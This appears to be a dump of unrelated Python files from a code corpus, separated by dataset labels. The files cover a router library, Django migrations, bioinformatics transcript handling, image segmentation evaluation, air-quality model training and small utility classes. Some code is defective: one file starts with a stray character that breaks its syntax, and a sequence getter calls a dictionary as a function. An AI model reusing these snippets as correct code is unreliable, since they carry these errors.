server = HTTPServer(('', port), Handler)

# mark as started
mqtt.publish("jarvis/nlu", "started")

# load and transform the training dataset
with io.open(config["dataset"]) as f:
    dataset = json.load(f)
    dataset = helper.transform_dataset(dataset)

# train the snips-nlu engine
helper.log("nlu", "training nlu engine")
start = time.time()
nlu = snips_nlu.SnipsNLUEngine()
nlu = nlu.fit(dataset)
helper.log("nlu", "finished training (took {:.2f}s)".format(time.time() - start))

# if a single message was passed on the command line, parse it once and exit
if args.message is not None:
    parsed = nlu.parse(args.message)
    print(json.dumps(parsed))
    exit(0)

# mainloop
while True:
    server.handle_request()

mqtt.publish("jarvis/nlu", "stopped")
nilq/baby-python
python
import pickle import pytest from routrie import Router def test_routing() -> None: router = Router( routes={ "/": 0, "/users": 1, "/users/:id": 2, "/users/:id/:org": 3, "/users/:user_id/repos": 4, "/users/:user_id/repos/:id": 5, "/users/:user_id/repos/:id/*any": 6, "/:username": 7, "/*any": 8, "/about": 9, "/about/": 10, "/about/us": 11, "/users/repos/*any": 12, } ) # Matched "/" node = router.find("/") assert node is not None match, params = node assert match == 0 assert params == [] # Matched "/:username" node = router.find("/username") assert node is not None match, params = node assert match == 7 assert params == [("username", "username")] # Matched "/*any" node = router.find("/user/s") assert node is not None match, params = node assert match == 8 assert params == [("any", "user/s")] def test_no_match() -> None: router = Router(routes={"/": 0}) # No match node = router.find("/noway-jose") assert node is None def test_serialization() -> None: router = Router({"/": 0}) router: Router[int] = pickle.loads(pickle.dumps(router)) # No match node = router.find("/noway-jose") assert node is None # Match node = router.find("/") assert node is not None match, params = node assert match == 0 assert params == [] def test_duplicate_route() -> None: router = Router( routes=dict( [ ("/", 0), ("/", 1), ] ) ) # No match node = router.find("/") assert node is not None match, params = node assert match == 1 assert params == [] if __name__ == "__main__": pytest.main()
nilq/baby-python
python
import os import sys sys.path.append(f'{os.getcwd()}/example/bpapi/vendor')
nilq/baby-python
python
# Generated by Django 2.2.11 on 2020-04-09 13:49 from django.db import migrations, models import django.db.models.deletion import wagtail.core.fields class Migration(migrations.Migration): dependencies = [ ('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'), ('contentPages', '0015_auto_20200408_1435'), ] operations = [ migrations.CreateModel( name='ReusableContent', fields=[ ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')), ('name', models.CharField(max_length=100)), ('content_body', wagtail.core.fields.RichTextField(default='')), ], options={ 'verbose_name': 'Content Title', 'verbose_name_plural': 'Content Titles', }, bases=('wagtailcore.page',), ), ]
nilq/baby-python
python
import urllib.parse


def assert_urls_match(u1, u2):
    p1 = urllib.parse.urlparse(u1)
    p2 = urllib.parse.urlparse(u2)
    assert p1.scheme == p2.scheme
    assert p1.netloc == p2.netloc
    assert p1.path == p2.path
    assert urllib.parse.parse_qs(p1.query) == urllib.parse.parse_qs(p2.query)


class FakeResponse:
    def __init__(self, text='', status_code=200, url=None):
        self.text = text
        self.status_code = status_code
        self.content = text and bytes(text, 'utf8')
        self.url = url
        self.headers = {'content-type': 'text/html'}

    def __repr__(self):
        return 'FakeResponse(status={}, text={}, url={})'.format(
            self.status_code, self.text, self.url)

    def raise_for_status(self):
        pass


class FakeUrlOpen:
    def __init__(self, url=None, info=None):
        self.url_ = url
        self.info_ = info

    def __repr__(self):
        return 'FakeUrlOpenResponse(url={})'.format(self.url_)

    def geturl(self):
        return self.url_

    def info(self):
        return self.info_


class FakeUrlMetadata:
    def __init__(self, content_type, content_length):
        self.content_type = content_type
        self.content_length = content_length

    def get(self, prop):
        if prop.lower() == 'content-length':
            return self.content_length
        if prop.lower() == 'content-type':
            return self.content_type

    def get_content_maintype(self):
        return self.content_type.split('/')[0]
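# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original helpers): it shows how the
# fakes above are typically consumed in tests; URLs and values are
# illustrative.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    # query-string order should not matter
    assert_urls_match('http://example.com/a?x=1&y=2',
                      'http://example.com/a?y=2&x=1')

    resp = FakeResponse(text='<html></html>', status_code=200,
                        url='http://example.com/a')
    assert resp.content == b'<html></html>'
    resp.raise_for_status()  # no-op, mirrors requests.Response

    meta = FakeUrlMetadata(content_type='image/png', content_length=1024)
    opened = FakeUrlOpen(url='http://example.com/img.png', info=meta)
    assert opened.geturl() == 'http://example.com/img.png'
    assert opened.info().get_content_maintype() == 'image'
    assert opened.info().get('Content-Length') == 1024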
nilq/baby-python
python
# -*- coding: utf-8 -*-
"""Defines `json.JSONEncoder` subclass that makes parsed objects (including
bytes and bitarray) JSON-serializable
"""

import bitarray
import json
import sys


class JSONEncoder(json.JSONEncoder):
    """JSON encoder with additional support for bytes and bitarray

    Examples:
        >>> JSONEncoder().encode({"field1": 123})
        '{"field1": 123}'
        >>> JSONEncoder().encode({"field1": b'\x12\x34'})
        '{"field1": "1234"}'
        >>> JSONEncoder().encode({"field1": bitarray.bitarray('01010')})
        '{"field1": "01010"}'
        >>> JSONEncoder(compact_bitarray=True).encode({"field1": bitarray.bitarray('01010')})
        '{"field1": {"value": "50", "length": 5}}'
        >>> JSONEncoder().encode({"field1": {"Type": 567}})
        '{"field1": {"Type": 567}}'
    """

    def __init__(self, compact_bitarray=False, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._compact_bitarray = bool(compact_bitarray)

    def default(self, o):
        if isinstance(o, (bytes, bytearray)):
            return o.hex()
        elif isinstance(o, bitarray.bitarray):
            if self._compact_bitarray:
                return {'value': o.tobytes().hex(), 'length': len(o)}
            else:
                return o.to01()
        else:
            # fall back to the base class, which raises TypeError for
            # unsupported types
            return super().default(o)
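# Hedged usage sketch (not part of the original module): encoding a parsed
# object that mixes bytes and bitarray fields in one document; the field
# names and values are illustrative.
if __name__ == "__main__":
    parsed = {
        "header": b"\xca\xfe",
        "flags": bitarray.bitarray("1101"),
        "length": 4,
    }
    print(JSONEncoder().encode(parsed))
    # '{"header": "cafe", "flags": "1101", "length": 4}'
    print(JSONEncoder(compact_bitarray=True).encode(parsed))
    # '{"header": "cafe", "flags": {"value": "d0", "length": 4}, "length": 4}'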
nilq/baby-python
python
from os.path import getsize from .constants import ATTACHMENT_CONTENT_TYPES from .errors import FastScoreError class Attachment(object): """ Represents a model attachment. An attachment can be created directly but it must (ultimately) associated with the model: >>> att = fastscore.Attachment('att-1', datafile='/tmp/att1.zip') >>> model = mm.models['model-1'] >>> att.upload(model) :param atype: An attachment type. Guessed from the data file name if omitted. :param datafile: The data file. :param model: The model instance. """ def __init__(self, name, atype=None, datafile=None, datasize=None, model=None): self._name = name if atype == None and datafile != None: atype = guess_type(datafile) self._atype = atype if datasize == None and datafile != None: datasize = getsize(datafile) self._datasize = datasize self._datafile = datafile self._model = model @property def name(self): """ An attachment name. """ return self._name @property def atype(self): """ An attachment type. * **zip** A ZIP archive. * **tgz** A gzipped tarball. """ return self._atype @atype.setter def atype(self, atype): assert atype in ATTACHMENT_CONTENT_TYPES self._atype = atype @property def datafile(self): """ A name of the file that contains the attachment data. The attachment is downloaded when this property is first accessed. """ if self._datafile == None: self._datafile = self._model.download_attachment(self._name) return self._datafile @datafile.setter def datafile(self, datafile): self._datafile = datafile if datafile: self._datasize = getsize(datafile) else: self._datasize = None @property def datasize(self): """ The size of the attachment. Checking the attachment size does NOT trigger the download. """ return self._datasize def upload(self, model=None): """ Adds the attachment to the model. :param model: The model instance. Can be None if the model instance has been provided when the attachemnet was created. """ if model == None and self._model == None: raise FastScoreError("Attachment '%s' not associated with a model" % self.name) if self._model == None: self._model = model self._model.save_attachment(self) def guess_type(datafile): if datafile.endswith('.zip'): return 'zip' elif datafile.endswith('.tar.gz'): return 'tgz' elif datafile.endswith('.tgz'): return 'tgz' else: raise FastScoreError("Unable to guess attachment type for '%s'" % datafile)
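# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): it creates a
# throwaway .zip file so that the type and size can be guessed locally,
# without a Model Manage connection. Because of the relative imports above it
# only runs when invoked as a module inside the package (e.g. with python -m).
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import os
    import tempfile

    assert guess_type('model.tar.gz') == 'tgz'

    tmp = tempfile.NamedTemporaryFile(suffix='.zip', delete=False)
    tmp.write(b'dummy')
    tmp.close()

    att = Attachment('att-1', datafile=tmp.name)
    assert att.name == 'att-1'
    assert att.atype == 'zip'       # guessed from the .zip extension
    assert att.datasize == 5        # size taken from the file on disk

    os.unlink(tmp.name)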
nilq/baby-python
python
# The Path class represents paths on a graph and records the total path cost class Path: def __init__(self): self.length = 0 self.cost = 0 self.nodes = [] # adds a node to the end of the path def add_node(self, node_label, cost): self.length += 1 self.cost += cost self.nodes.append(node_label) # reverses the path (this is useful when building Paths from child to parent) def reverse(self): self.nodes.reverse() def __str__(self): return " -> ".join(self.nodes) + "\t (Cost: %s)" % self.cost
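# Hedged usage sketch (not part of the original class): node labels and costs
# are illustrative. Paths are often built child -> parent and then reversed.
if __name__ == "__main__":
    path = Path()
    for label, cost in [("C", 2), ("B", 3), ("A", 0)]:
        path.add_node(label, cost)
    path.reverse()
    print(path)  # A -> B -> C	 (Cost: 5)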
nilq/baby-python
python
######################################################### # 2020-01-28 13:15:09 # AI # ins: MOV @Ri, A ######################################################### import random from .. import testutil as u from ..sim51util import SIMRAM from ..asmconst import * p = u.create_test() ram = SIMRAM() def test_rs(rs, psw_rs, p): p += ";; set rs" p += atl.move(SFR_PSW, atl.I(psw_rs)) ram.set_direct(SFR_PSW.x, psw_rs) def test_ri(RI, p): indirect = random.getrandbits(8) a = random.getrandbits(8) p += atl.move(atl.D(RI.addr), atl.I(indirect)) p += atl.move(SFR_A, atl.I(a)) p += f'MOV {RI}, A' ram.set_iram(RI.addr, indirect) ram.set_direct(SFR_A.x, a) ram.set_iram(indirect, ram.get_direct(SFR_A.x)) p += atl.aste(RI, atl.I(ram.get_iram(ram.get_direct(RI.addr)))) for x in range(486): p.iter_ri(test_rs, test_ri)
nilq/baby-python
python
import sys, re, hashlib, json, random import GenePredBasics, SequenceBasics from SerializeBasics import encode_64, decode_64 # Transcriptome is a set of genepred entries # with the corresponding fasta file. # alternatively, you can read in a serialized transcriptome. # # You can further define a transcriptome file with an expression file # This file can be of the form of a TSV # class Transcriptome: def __init__(self): self.transcripts = {} self.expression = None self.ref_hash = None def get_serialized(self): a = {} a['transcripts'] = self.transcripts if self.expression: a['expression'] = self.expression.get_serialized() else: a['expression'] = None a['ref_hash'] = self.ref_hash return encode_64(a) def read_serialized(self,input): a = decode_64(input) self.transcripts = a['transcripts'] if a['expression']: self.expression = IsoformExpression() self.expression.read_serialized(a['expression']) else: self.expression = a['expression'] self.ref_hash = a['ref_hash'] def set_reference_genome_dictionary(self,indict): self.ref_hash = indict return # Adds an expression value and updates the rng data def add_expression(self,inname,exp): if not self.expression: self.expression = IsoformExpression() for name in self.transcripts: self.expression.add_expression(name,0) self.expression.add_expression(inname,exp) self.expression.update_expression() # Add an expression value, but you'll have to update it yourself. def add_expression_no_update(self,inname,exp): if not self.expression: self.expression = IsoformExpression() for name in self.transcripts: self.expression.add_expression(name,0) self.expression.add_expression(inname,exp) def update_expression(self): if self.expression: self.expression.update_expression() else: sys.stderr.write("WARNING: expression was not set yet. nothing to update\n") def add_genepred_line(self,inline): if not self.ref_hash: sys.stderr.write("ERROR: Must assign a reference genome dictionary first\n") sys.exit() gpd = GenePredBasics.GenePredEntry(inline) if gpd.value('name') in self.transcripts: sys.stderr.write("WARNING: "+inline+" transcript was already set\n") seq = '' for i in range(0,gpd.value('exonCount')): seq += self.ref_hash[gpd.value('chrom')][gpd.value('exonStarts')[i]:gpd.value('exonEnds')[i]].upper() if gpd.value('strand') == '-': seq = SequenceBasics.rc(seq) self.transcripts[gpd.value('name')] = seq return # This is depreciated #def read_from_fasta_and_genepred(self,genomefastafile,genepredfile): # # read in our genome # seen_names = {} # seen_coords = {} # genepred = {} # with open(genepredfile) as inf: # for line in inf: # if re.match('^#',line): continue # e = GenePredBasics.line_to_entry(line) # hexcoord = hashlib.sha1(e['chrom']+"\t"+e['strand'] + "\t" + str(e['exonStarts'])+"\t" + str(e['exonEnds'])).hexdigest() # dupname = 0 # dupcoord = 0 # if hexcoord in seen_coords: # sys.stderr.write("Warning "+ e['name'] + " " + e['gene_name'] + " exists at identical coordinates as another entry\n") # dupcoord = 1 # seen_coords[hexcoord] = 1 # currname = e['name'] # if e['name'] in seen_names: # if dupcoord == 1: # sys.stderr.write("skipping perfect duplicate of "+e['name']+"\n") # continue # newname = e['name'] + "."+str(len(seen_names[e['name']])+1) # currname = newname # seen_names[e['name']].append(newname) # sys.stderr.write("Warning "+ e['name'] + " " + e['gene_name'] + " is a duplicate name.. 
renaming to "+newname+ "\n") # dupname = 1 # else: # seen_names[e['name']] = [] # seen_names[e['name']].append(e['name']) # genepred[currname] = e # # #print "reading names and locs" # ref = SequenceBasics.read_fasta_into_hash(genomefastafile) # #print "converting sequences" # for transcript in genepred: # e = genepred[transcript] # if e['chrom'] in ref: # seq = '' # self.transcript_names[transcript] = genepred[transcript]['name'] # for i in range(0,e['exonCount']): # seq += ref[e['chrom']][e['exonStarts'][i]:e['exonEnds'][i]] # if e['strand'] == '-': seq = SequenceBasics.rc(seq) # self.transcripts[transcript] = seq.upper() # self.gpds[transcript] = e # Pre: Expression must have been set # Post: Returns a random transcript name def get_random_by_expression(self): return self.expression.get_random_by_expression() def get_uniform_random(self): tnames = self.transcripts.keys() tnum = len(tnames) rnum = random.randint(0,tnum-1) return tnames[rnum] # Default to random by expression if its set def get_random(self): if self.expression: return self.get_random_by_expression() return self.get_uniform_random() def get_sequence(self,name): if name not in self.transcripts: sys.stderr.write("ERROR: "+name+" not in transcripts\n") sys.exit() return self.transcripts('name') # Class holds the isoform names and expression values # And also has functions for randomly getting an isoform name # either by uniform distribution or class IsoformExpression: def __init__(self): self.expression = {} self.total_expression = None self.names = None return # Pre: TSV with <transcript name> <expression level> def read_tsv(self,filename): with open(filename) as inf: for line in inf: f = line.rstrip().split("\t") self.expression[f[0]]=float(f[1]) self.update_expression() def get_expression(self,transcript_name): if transcript_name not in self.expression: sys.stderr.write("ERROR: "+transcript_name+" not in expression") sys.exit() return self.expression[transcript_name] # Add a single expression value, you need to update_expression in order to set rng things def add_expression(self,transcript_name,expression): self.expression[transcript_name] = expression def read_serialized(self,instring): self.expression = decode_64(instring) self.update_expression() def get_serialized(self): return encode_64(self.expression) def get_random_by_expression(self): rnum = random.random() total = 0 for name in self.names: total += self.expression[name]/self.total_expression if rnum < total: return name return name def get_uniform_random(self): rnum = random.randint(0,len(self.names)-1) return self.names[rnum] def update_expression(self): self.names = sorted(self.expression.keys()) self.total_expression = sum([self.expression[x] for x in self.expression])
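# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): it exercises only
# IsoformExpression, which needs no reference genome, assuming the local
# SerializeBasics helpers imported above are available. Transcript names and
# expression values are illustrative.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    expr = IsoformExpression()
    expr.add_expression('tx1', 10.0)
    expr.add_expression('tx2', 30.0)
    expr.update_expression()
    print(expr.get_expression('tx2'))        # 30.0
    print(expr.get_random_by_expression())   # 'tx2' roughly 3 times out of 4
    serialized = expr.get_serialized()
    restored = IsoformExpression()
    restored.read_serialized(serialized)
    print(restored.get_expression('tx1'))    # 10.0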
nilq/baby-python
python
from cnnlevelset.pascalvoc_util import PascalVOC from cnnlevelset.localizer import Localizer from cnnlevelset import config as cfg from collections import defaultdict import tensorflow as tf import keras.backend as K import numpy as np import matplotlib.pyplot as plt import sys import time tf.python.control_flow_ops = tf pascal = PascalVOC(cfg.PASCAL_PATH) X_img_test, X_test, y_test, y_seg = pascal.get_test_data(10000, False) cls_y_test = y_test[:, :, 0] N = float(X_img_test.shape[0]) localizer = Localizer(model_path=cfg.MODEL_PATH) start = time.time() cls_preds, bbox_preds = localizer.predict(X_test) end = time.time() print('CNN time: {:.4f}'.format(end - start)) print('Average: {:.4f}'.format((end - start) / N)) cls_acc = np.mean(np.argmax(cls_preds, axis=1) == np.argmax(cls_y_test, axis=1)) print(cls_acc) K.clear_session() from cnnlevelset.segmenter import * if len(sys.argv) > 1 and sys.argv[1] == 'show': show = True else: show = False bbox_res, border_res, cnn_res = defaultdict(list), defaultdict(list), defaultdict(list) i = 0 for img, y, cls_pred, bbox_pred, ys in zip(X_img_test, y_test, cls_preds, bbox_preds, y_seg): if show: label = pascal.idx2label[np.argmax(cls_pred)] print(label) img = img.reshape(224, 224, 3) plt.imshow(pascal.draw_bbox(img, bbox_pred)) plt.show() phi = phi_from_bbox(img, bbox_pred) levelset_segment_theano(img, phi=phi, sigma=5, v=1, alpha=100000, n_iter=80, print_after=80) input() else: start = time.time() phi = phi_from_bbox(img, bbox_pred) mask = (phi < 0) end = time.time() bbox_res['time'].append(end - start) bbox_res['accuracy'].append(pascal.segmentation_accuracy(mask, ys)) p, r, f1 = pascal.segmentation_prec_rec_f1(mask, ys) bbox_res['precision'].append(p) bbox_res['recall'].append(r) bbox_res['f1'].append(f1) start = time.time() phi = default_phi(img) mask = levelset_segment_theano(img, phi=phi, sigma=5, v=1, alpha=100000, n_iter=80) end = time.time() border_res['time'].append(end - start) border_res['accuracy'].append(pascal.segmentation_accuracy(mask, ys)) p, r, f1 = pascal.segmentation_prec_rec_f1(mask, ys) border_res['precision'].append(p) border_res['recall'].append(r) border_res['f1'].append(f1) start = time.time() phi = phi_from_bbox(img, bbox_pred) mask = levelset_segment_theano(img, phi=phi, sigma=5, v=1, alpha=100000, n_iter=80) end = time.time() cnn_res['time'].append(end - start) cnn_res['accuracy'].append(pascal.segmentation_accuracy(mask, ys)) p, r, f1 = pascal.segmentation_prec_rec_f1(mask, ys) cnn_res['precision'].append(p) cnn_res['recall'].append(r) cnn_res['f1'].append(f1) i += 1 print(i) if not show: for metric in ['accuracy', 'precision', 'recall', 'f1']: print(metric) print('----------------') print('Bbox: {}'.format(np.mean(bbox_res[metric]))) print('Border: {}'.format(np.mean(border_res[metric]))) print('CNN: {}'.format(np.mean(cnn_res[metric]))) print() print('Time') print('---------------------') print('Bbox: {}'.format(np.mean(bbox_res['time']))) print('Border: {}'.format(np.mean(border_res['time']))) print('CNN: {}'.format(np.mean(cnn_res['time']))) print()
nilq/baby-python
python
a''' Created on 6-feb-2017 Modified the 20170321, by EP @author: roncolato ''' import numpy as np import scipy.interpolate as interpol from sherpa.training.step1 import from7to28 as f7 from sherpa.training.step1 import quant as q from sherpa.training.step1 import EquaPrec as ep from sherpa.training import EquaIndic as ei from sherpa.training.step1 import nlparci as nlpa from sherpa.training.step1 import InvDistN_opt_prec as inv from sherpa.training.step1 import nlinfit as nlin def step1_potency(conf): prctileVec1=np.array([35, 35, 35, 35, 35]); prctileVec2=np.array([70, 70, 70, 70, 70]); categories=np.array([1,2,3]) #convert from 28 to 7 km Prec = f7.from7to28(conf.Prec); ny = int(conf.ny/4); nx = int(conf.nx/4); rad = conf.radStep1; nPrec = conf.nPrec; rf = conf.rf; flagRegioMat = np.copy(conf.flagRegioMat); #pad Prec with zeros around initial matrix, to perform matrix products later on Prec2 = np.zeros((ny+rad*2,nx+rad*2,Prec.shape[2],Prec.shape[3])); Prec2[rad:-rad,rad:-rad,:,:] = Prec[:,:,:,:]; Prec=Prec2; #convert from 28 to 7 km Indic = f7.from7to28(conf.Indic); flagRegioMat = f7.from7to28(flagRegioMat); #initialize variables omega = np.full([ny,nx,nPrec],np.nan); alpha = np.full([ny,nx,nPrec],np.nan); ci2 = np.empty((categories.size,nPrec), dtype=object); CovB2 = np.empty((categories.size,nPrec), dtype=object); alphaTmp = np.zeros((categories.size)); omegaTmp = np.zeros((categories.size)); #define training scenarios; note scenarios number is +1 if checking DoE...as in line 74 it is -1 if conf.domain == 'emep10km': if conf.aqi == 'SURF_ug_PM25_rh50-Yea': IdeVec = (np.array([1, 1]),np.array([1, 2]),np.array([1, 3]),np.array([1, 5]),np.array([1, 6])); elif conf.aqi == 'SURF_ug_PM10_rh50-Yea': IdeVec = (np.array([1, 1]),np.array([1, 2]),np.array([1, 3]),np.array([1, 4]),np.array([1, 6])); elif conf.domain == 'ineris7km': IdeVec = (np.array([1, 8]),np.array([1, 9]),np.array([1, 10]),np.array([1, 11]),np.array([1, 12])); #loop over precursors for precursor in range(0, nPrec): PREC = precursor; Ide = IdeVec[precursor]; icel = 0; #intialize variables PrecPatch = np.zeros((nx*ny,(rad*2+1)**2)); IndicEq = np.zeros((nx*ny,1)); indexUsed = np.full((nx*ny,1),np.nan);#np.zeros((nx*ny,1)); potency=np.full((ny,nx),np.nan);#np.zeros((ny,nx)); print('precursor: '+str(PREC)); #loop over cells to create groups for ic in range(0, nx): #print(PREC, ic); for ir in range(0, ny): if flagRegioMat[ir,ic]>0: #create data for omega calculation nSc = Ide.shape[0]-1;# size(Ide,2)-1 tmpPrec = ep.EquaPrec(ic,ir,rf,nx,ny,nSc,Prec.shape[3],Prec[:,:,Ide[1],PREC],rad); # patches tmpInde = ei.EquaIndic(ic,ir,rf,nx,ny,nSc,Indic[:,:,Ide[1]]); # indicator x0=np.array([1, 2]); [inp2_aggemi]= inv.InvDistN_opt_prec(x0,tmpPrec,rad); #store data for omega calculation potency[ir,ic]=tmpInde/inp2_aggemi; prc1=np.percentile(potency[np.isfinite(potency)],prctileVec1[precursor]); prc9=np.percentile(potency[np.isfinite(potency)],prctileVec2[precursor]); speed=potency.copy(); speed[np.isnan(speed)]=0 potency[speed<prc1]=1; potency[(speed>=prc1) & (speed<prc9)]=2; potency[speed>=prc9]=3; val=categories; for ic in range(0, nx): #print(PREC, ic); for ir in range(0, ny): if flagRegioMat[ir,ic]>0: #variable to store which group ot be considered indexUsed[icel] = np.where(val==potency[ir,ic]); #create data for omega calculation nSc = Ide.shape[0]-1;# size(Ide,2)-1 tmpPrec = ep.EquaPrec(ic,ir,rf,nx,ny,nSc,Prec.shape[3],Prec[:,:,Ide[1],PREC],rad); # patches tmpInde = ei.EquaIndic(ic,ir,rf,nx,ny,nSc,Indic[:,:,Ide[1]]); # indicator #store data 
for omega calculation PrecPatch[icel,:] = tmpPrec; #np.squeeze(tmpPrec) IndicEq[icel] = tmpInde; icel = icel+1; indexUsedLin = np.reshape(indexUsed, -1, order='F'); #compute omega for each group of cells, given precursor p for i in range(val.size): x0 = [1, 2]; ind = np.where(indexUsedLin==i)[0]; inp1 = PrecPatch[ind,:]; inp2 = IndicEq[ind]; iop = lambda inp1,beta1,beta2: inv.InvDistN_opt_prec([beta1,beta2],inp1,rad); [mdl,r,J,CovB] = nlin.nlinfit(iop,inp1,inp2.ravel(),x0); ci2[i,PREC] = nlpa.nlparci(r,J); CovB2[i,PREC] = CovB; alphaTmp[i] = mdl[0]; omegaTmp[i] = mdl[1]; #repeat result for each belonging to a given group for ic in range(0, nx): for ir in range(0, ny): if flagRegioMat[ir,ic]>0: indexUsed = np.where(val==potency[ir,ic])[0]; alpha[ir,ic,PREC] = alphaTmp[indexUsed]; omega[ir,ic,PREC] = omegaTmp[indexUsed]; del(PrecPatch,IndicEq,indexUsed,potency,speed) #rescale to initial spatial resolution, through nearest interpolation #initialize variable omegaFinal = np.zeros((conf.Prec.shape[0],conf.Prec.shape[1],5)); #loop on precursors for i in range(0, nPrec): #define interpolator object xgv = np.arange(1., conf.Prec.shape[0]/4+1); ygv = np.arange(1., conf.Prec.shape[1]/4+1); F=interpol.RegularGridInterpolator((xgv, ygv), omega[:,:,i],method='nearest',bounds_error=False, fill_value=None); #interpolate Xq = np.arange(1., conf.Prec.shape[0]/4+1, 1/4); Yq = np.arange(1., conf.Prec.shape[1]/4+1, 1/4); [Y2,X2] = np.meshgrid(Yq, Xq); pts=((X2.flatten(),Y2.flatten())) omegaFinal[:,:,i] = F(pts).reshape(conf.Prec.shape[0],conf.Prec.shape[1]) print('precursor interpolated: '+str(i)); #store final results conf.omegaFinalStep1 = omegaFinal; conf.ci2Step1 = ci2; conf.CovB2Step1 = CovB2;
nilq/baby-python
python
"""ibc client module data objects.""" from __future__ import annotations import attr from terra_proto.ibc.core.client.v1 import Height as Height_pb from terra_sdk.util.json import JSONSerializable __all__ = ["Height"] @attr.s class Height(JSONSerializable): revision_number: int = attr.ib(default=0, converter=int) revision_height: int = attr.ib(default=0, converter=int) def to_amino(self) -> dict: return { "revision_number": self.revision_number, "revision_height": self.revision_height } @classmethod def from_data(cls, data: dict) -> Height: return cls( revision_number=data["revision_number"], revision_height=data["revision_height"], ) @classmethod def from_proto(cls, proto: Height_pb) -> Height: return cls( revision_number=proto.revision_number, revision_height=proto.revision_height, ) def to_proto(self) -> Height_pb: return Height_pb( revision_number=self.revision_number, revision_height=self.revision_height )
nilq/baby-python
python
import numpy as np import scipy as scp from numpy.linalg import norm ############################################# # Add the one-folder-up-path import os import sys sys.path.append(os.path.join(os.path.dirname(__file__), '../')) ############################################# from envs.blocking_env import BlockingEnv def test_create_environment(): x = 5 assert x == 5, 'test failed' # # env_info = { # 'agent_count_red': 4, # 'agent_count_blue': 4 # } # env = BlockingEnv(env_info)
nilq/baby-python
python
from annotation_utils.ndds.structs import NDDS_Dataset dataset = NDDS_Dataset.load_from_dir('/home/clayton/workspace/prj/data_keep/data/ndds/measure_kume_map3_1_200', show_pbar=True) dataset.save_to_dir('save_test', show_pbar=True)
nilq/baby-python
python